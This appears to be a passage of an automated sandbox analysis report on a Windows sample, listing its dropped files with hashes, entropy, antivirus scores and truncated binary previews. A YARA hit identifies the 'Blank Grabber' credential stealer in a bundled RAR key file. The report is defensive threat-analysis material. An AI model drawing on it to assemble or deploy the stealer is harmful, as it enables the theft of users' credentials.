                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........._~.._~.._~..V.S.M~.....]~.....[~.....W~.....S~.._~...~......T~..J....~..J...7}..J...^~..J.?.^~..J...^~..Rich_~..........................PE..d......f.........." ...(. .......p:.`.P...:..................................0S...........`......................................... .P......P.h.....P...... L. .............S..................................... .P.@...........................................UPX0.....p:.............................UPX1..... ....:.....................@....rsrc.........P......"..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\libffi-8.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):29968
                                                                                                                                                                                                                            Entropy (8bit):7.677818197322094
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:768:3p/6aepjG56w24Up3p45YiSyvkIPxWEqG:tA154spK7SytPxF
                                                                                                                                                                                                                            MD5:08B000C3D990BC018FCB91A1E175E06E
                                                                                                                                                                                                                            SHA1:BD0CE09BB3414D11C91316113C2BECFFF0862D0D
                                                                                                                                                                                                                            SHA-256:135C772B42BA6353757A4D076CE03DBF792456143B42D25A62066DA46144FECE
                                                                                                                                                                                                                            SHA-512:8820D297AEDA5A5EBE1306E7664F7A95421751DB60D71DC20DA251BCDFDC73F3FD0B22546BD62E62D7AA44DFE702E4032FE78802FB16EE6C2583D65ABC891CBF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".@................................................................`.....................................................................P.......................................................@...........................................UPX0....................................UPX1.....@.......<..................@...UPX2.................@..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\libssl-3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):227096
                                                                                                                                                                                                                            Entropy (8bit):7.928768674438361
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:PpEswYxCQyTp2Z/3YUtoQe5efEw+OXDbM3nFLQdFM4mNJQ:PpAqo92h3Y660Ew+OTbAFLQd2lw
                                                                                                                                                                                                                            MD5:B2E766F5CF6F9D4DCBE8537BC5BDED2F
                                                                                                                                                                                                                            SHA1:331269521CE1AB76799E69E9AE1C3B565A838574
                                                                                                                                                                                                                            SHA-256:3CC6828E7047C6A7EFF517AA434403EA42128C8595BF44126765B38200B87CE4
                                                                                                                                                                                                                            SHA-512:5233C8230497AADB9393C3EE5049E4AB99766A68F82091FE32393EE980887EBD4503BF88847C462C40C3FC786F8D179DAC5CB343B980944ADE43BC6646F5AD5A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l.>..|m..|m..|m.u.m..|m+.}l..|m.u}l..|m+..l..|m+.xl..|m+.yl..|m..}l..|m..}m..|m..xl..|m..|l..|m...m..|m..~l..|mRich..|m................PE..d......f.........." ...(.....P...... z....................................................`............................................,C......8............ ...M.................................................. ...@...........................................UPX0....................................UPX1................................@....rsrc....P.......L..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\python313.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):1850640
                                                                                                                                                                                                                            Entropy (8bit):7.994061638516346
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:49152:l+wZGihuIlkSb9jVzMR3Wbp+JL3o+2H5V8Saryhll3DgsZ:1GbYk8w9YpgLY+2H5eSaryt3DgM
                                                                                                                                                                                                                            MD5:6EF5D2F77064DF6F2F47AF7EE4D44F0F
                                                                                                                                                                                                                            SHA1:0003946454B107874AA31839D41EDCDA1C77B0AF
                                                                                                                                                                                                                            SHA-256:AB7C640F044D2EB7F4F0A4DFE5E719DFD9E5FCD769943233F5CECE436870E367
                                                                                                                                                                                                                            SHA-512:1662CC02635D63B8114B41D11EC30A2AF4B0B60209196AAC937C2A608588FEE47C6E93163EA6BF958246C32759AC5C82A712EA3D690E796E2070AC0FF9104266
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s]{v ]{v ]{v M.w!_{v M.. S{v M.u!Y{v M.r!U{v M.s!P{v T.. G{v ..w!V{v ]{w .zv ..{!.{v ..v!\{v ... \{v ..t!\{v Rich]{v ........................PE..d......g.........." ...).@........J..3e...J..................................0f...........`.........................................H_e......Ye......Pe......0]..............'f.4............................?e.(...@@e.@...........................................UPX0......J.............................UPX1.....@....J..2..................@....rsrc........Pe......6..............@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\rar.exe

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):630736
                                                                                                                                                                                                                            Entropy (8bit):6.409476333013752
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12288:3lPCcFDlj+gV4zOifKlOWVNcjfQww0S5JPgdbBC9qxbYG9Y:3lPCcvj+YYrfSOWVNcj1JS5JPgdbBCZd
                                                                                                                                                                                                                            MD5:9C223575AE5B9544BC3D69AC6364F75E
                                                                                                                                                                                                                            SHA1:8A1CB5EE02C742E937FEBC57609AC312247BA386
                                                                                                                                                                                                                            SHA-256:90341AC8DCC9EC5F9EFE89945A381EB701FE15C3196F594D9D9F0F67B4FC2213
                                                                                                                                                                                                                            SHA-512:57663E2C07B56024AAAE07515EE3A56B2F5068EBB2F2DC42BE95D1224376C2458DA21C965AAB6AE54DE780CB874C2FC9DE83D9089ABF4536DE0F50FACA582D09
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........@.a.@.a.@.a..v..F.a..v....a..v..M.a..J..B.a.{.b.H.a.{.d.j.a.{.e.U.a.I..K.a.@.`...a..d...a....A.a..c.A.a.Rich@.a.................PE..d....~.^.........."..........2.................@.............................p.......4....`..................................................]..x.......Xy......pD...`...?...`..........T...................x...(.......................@............................text...C........................... ..`.rdata..:p.......r..................@..@.data............2...b..............@....pdata..pD.......F..................@..@.tls................................@....rsrc...Xy.......z..................@..@.reloc.......`.......V..............@..B................................................................................................................................................................................................

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):456
                                                                                                                                                                                                                            Entropy (8bit):4.447296373872587
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:12:Bn9j9sxpCDPxfhKLiaE5cNH0u/OCIhjWO:B9jiWDpf025cNU7CIEO
                                                                                                                                                                                                                            MD5:4531984CAD7DACF24C086830068C4ABE
                                                                                                                                                                                                                            SHA1:FA7C8C46677AF01A83CF652EF30BA39B2AAE14C3
                                                                                                                                                                                                                            SHA-256:58209C8AB4191E834FFE2ECD003FD7A830D3650F0FD1355A74EB8A47C61D4211
                                                                                                                                                                                                                            SHA-512:00056F471945D838EF2CE56D51C32967879FE54FCBF93A237ED85A98E27C5C8D2A39BC815B41C15CAACE2071EDD0239D775A31D1794DC4DBA49E7ECFF1555122
                                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                                            Yara Hits:
                                                                                                                                                                                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\Users\user\AppData\Local\Temp\_MEI76122\rarreg.key, Author: Joe Security
                                                                                                                                                                                                                            Preview:RAR registration data.Blank-c.Stealer License.UID=e7ae0ee11c8703113d95.64122122503d95ca34668bc2ffb72bcf8579be24bc20f3cd84baaf.afcf62e30badf158ad0c60feb872189f288e79eb40c28ca0ab6407.3a46f47624f80a44a0e4d71ef4224075bf9e28fce340a29099d287.15690be6b591c3bb355e99d6d1b8ffcd69602cb8aaa6dedf268c83.55c1fb90c384a926139625f6c0cbfc57a96996fdb04075bf9e28fc.e340a29067e9237e333577d2c7f3ed1d0f63287f74c9e50c60d76d.b5915ff59f78103d48e0826658d72ba8813da4a649711057613203.

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\select.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):26384
                                                                                                                                                                                                                            Entropy (8bit):7.471075877103443
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:384:LZPhXaWPBRc6hmfZa7gJXIj2IJ9G46SHQIYiSy1pCQ4HWSJIVE8E9VF0Ny6sC:XaWlspYj2IJ9G4L5YiSyvy2ES
                                                                                                                                                                                                                            MD5:FB70AECE725218D4CBA9BA9BBB779CCC
                                                                                                                                                                                                                            SHA1:BB251C1756E5BF228C7B60DAEA1E3B6E3F9F0FF5
                                                                                                                                                                                                                            SHA-256:9D440A1B8A6A43CFAA83B9BC5C66A9A341893A285E02D25A36C4781F289C8617
                                                                                                                                                                                                                            SHA-512:63E6DB638911966A86F423DA8E539FC4AB7EB7B3FB76C30C16C582CE550F922AD78D1A77FA0605CAFFA524E480969659BF98176F19D5EFFD1FC143B1B13BBAAF
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........tV..'V..'V..'_.j'T..'F:.&T..'F:.&R..'F:.&^..'F:.&Z..'.;.&T..'V..'...'...&S..'.;.&W..'.;.&W..'.;.'W..'.;.&W..'RichV..'................PE..d.....g.........." ...).0..........@.....................................................`......................................... ...L....................`..............l.......................................P...@...........................................UPX0....................................UPX1.....0.......(..................@....rsrc................,..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\sqlite3.dll

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):659216
                                                                                                                                                                                                                            Entropy (8bit):7.993010988331354
                                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                                            SSDEEP:12288:ZI2xdk6g1SJU1uQWhSskWXgN/YeZE21RUMza8WznRGO+4:ZbxYw+AXSskaSweZ91uMu80x+4
                                                                                                                                                                                                                            MD5:21AEA45D065ECFA10AB8232F15AC78CF
                                                                                                                                                                                                                            SHA1:6A754EB690FF3C7648DAE32E323B3B9589A07AF2
                                                                                                                                                                                                                            SHA-256:A1A694B201976EA57D4376AE673DAA21DEB91F1BF799303B3A0C58455D5126E7
                                                                                                                                                                                                                            SHA-512:D5C9DC37B509A3EAFA1E7E6D78A4C1E12B5925B5340B09BEE06C174D967977264C9EB45F146ABED1B1FC8AA7C48F1E0D70D25786ED46849F5E7CC1C5D07AC536
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......gsX.#.6.#.6.#.6.*j../.6.3.7.!.6.3.5.'.6.3.2.+.6.3.3...6.hj7. .6.#.7...6.k.>.".6.k.6.".6.k..".6.k.4.".6.Rich#.6.........................PE..d.....g.........." ...).....0......`.....................................................`..............................................#..........................................................................p...@...........................................UPX0....................................UPX1................................@....rsrc....0.......0..................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pyd

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):267024
                                                                                                                                                                                                                            Entropy (8bit):7.9826656358602595
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6144:5FHvhlPKHwqcv9DqegNsKUuFLttFHg+hMrZ99hYN8khE7xj:5tJlyHwqSBqpNsKUuntFJhMF9HC8jj
                                                                                                                                                                                                                            MD5:B2712B0DD79A9DAFE60AA80265AA24C3
                                                                                                                                                                                                                            SHA1:347E5AD4629AF4884959258E3893FDE92EB3C97E
                                                                                                                                                                                                                            SHA-256:B271BD656E045C1D130F171980ED34032AC7A281B8B5B6AC88E57DCE12E7727A
                                                                                                                                                                                                                            SHA-512:4DC7BD1C148A470A3B17FA0B936E3F5F68429D83D552F80051B0B88818AA88EFC3FE41A2342713B7F0F2D701A080FB9D8AC4FF9BE5782A6A0E81BD759F030922
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q.............(.....(.....(.....(.....)................).....).....)x....)....Rich..................PE..d.....g.........." ...).........0..P....@...................................0............`..........................................+..X....)....... .......................+..$...................................P...@...........................................UPX0.....0..............................UPX1.........@......................@....rsrc........ ......................@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cfzrjs5.a4z.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3w1jhhfd.2tt.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bbwhuhv2.zht.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c3pxwomo.kmc.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ihyebkbi.1gv.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jn1mfovn.txc.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kqqna5zc.ouw.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lvrvdxgc.bu0.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvsezsic.2az.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_njdpksry.z5s.psm1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_trkem45h.4bw.ps1

                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):60
                                                                                                                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                            Malicious:false
